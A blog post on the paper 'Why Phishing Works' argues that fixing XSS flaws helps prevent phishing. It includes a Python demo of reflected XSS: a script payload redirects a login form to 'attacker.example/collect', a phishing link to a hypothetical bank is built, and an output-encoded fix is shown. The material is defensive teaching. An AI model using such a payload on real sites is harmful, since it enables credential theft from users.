Read a paper titled “Why Phishing Works” (Dhamija, Tygar and Hearst, CHI 2006) a couple of days back. It provides some very cool analysis of how users develop trust in websites and when that trust causes people to fall prey to phishing attacks. The authors break users’ strategies for determining website legitimacy into five levels, ordered by which cues a user actually checks before trusting a site:
- Security indicators in website content only
- Content and domain name only
- Content and addresses, plus HTTPS
- All of the above, plus padlock icon
- All of the above, plus certificates
Let’s face it – if users only look at website content, there may be no hope for them. The attacker controls the content of a phishing page completely, so nothing the legitimate site does on its end can help; the only countermeasure for these folks is user education.
But – for the other four groups, preventing cross-site scripting (XSS) attacks against web applications blocks attackers from using those applications as phishing infrastructure. An XSS flaw lets the attacker inject their own content into a page served by the real site: the domain name in the address bar is correct, the connection is HTTPS, the padlock shows, and the certificate is the site’s genuine one, so every cue on the list above checks out while the injected script has, for example, rewritten the login form to post credentials to the attacker. Take that power away and users who check those cues have a fighting chance.
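As an added illustration (not code from the original post or from the paper), the snippet below shows the reflected-XSS case in miniature: a search page that echoes a query parameter into HTML without encoding, beside the same page with output encoding applied. The host name `bank.example`, the attacker host `attacker.example` and the page template are hypothetical, and the phishing link is constructed here for the demonstration. The point it makes is the one from the paragraph above: the link a victim receives points at the legitimate HTTPS origin, so domain, HTTPS, padlock and certificate checks all pass, yet the vulnerable rendering ships a script that redirects the login form to the attacker.

```python
from html import escape
from urllib.parse import quote, urlparse, parse_qs

# Hypothetical legitimate site (assumption for this example).
LEGIT_ORIGIN = "https://bank.example"

# Minimal page: a search echo plus the site's real login form.
PAGE_TEMPLATE = """<html><body>
<h1>Search results for: {term}</h1>
<form id="login" action="/login" method="post">
  <input name="user"><input name="pass" type="password">
  <button>Sign in</button>
</form>
</body></html>"""

# Constructed attacker payload: once it runs in the victim's browser,
# the genuine-looking login form posts credentials to the attacker.
PHISH_PAYLOAD = (
    '<script>document.getElementById("login").action='
    '"https://attacker.example/collect"</script>'
)


def render_vulnerable(term: str) -> str:
    """Reflected XSS: the user-controlled term lands in HTML verbatim."""
    return PAGE_TEMPLATE.format(term=term)


def render_hardened(term: str) -> str:
    """Same page with HTML output encoding; '<', '>', '&' and quotes
    become entities, so the payload is displayed as text, not executed."""
    return PAGE_TEMPLATE.format(term=escape(term, quote=True))


def phishing_link(payload: str) -> str:
    """The URL an attacker would mail out: it targets the REAL origin,
    carrying the payload in the reflected parameter."""
    return f"{LEGIT_ORIGIN}/search?q={quote(payload, safe='')}"


def term_from_link(url: str) -> str:
    """What the vulnerable application reads back from the request."""
    return parse_qs(urlparse(url).query)["q"][0]


def browser_indicators(url: str) -> dict:
    """The cues from the paper's levels 2 and 3 as the victim's browser
    sees them for this link (padlock and certificate follow from a
    genuine HTTPS connection to this host, so they pass as well)."""
    parsed = urlparse(url)
    return {"domain": parsed.netloc, "https": parsed.scheme == "https"}


if __name__ == "__main__":
    link = phishing_link(PHISH_PAYLOAD)
    print("phishing link:", link)
    print("indicators:", browser_indicators(link))
    term = term_from_link(link)
    print("--- vulnerable ---")
    print(render_vulnerable(term))
    print("--- hardened ---")
    print(render_hardened(term))
```

Output encoding in the HTML-body context is the fix shown here; the same term placed into an attribute, a URL or a script block needs the encoding for that context, which is why a templating engine with contextual auto-escaping is the practical remediation rather than hand-applied `escape()` calls.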
Asserting “fixing XSS flaws helps to prevent phishing” is certainly not news, but the paper provides actual numbers on the impact, grounded in user behavior studies. Great ammunition if you have to make a case for remediating application security vulnerabilities before implementing the next great feature.
dan _at_ denimgroup.com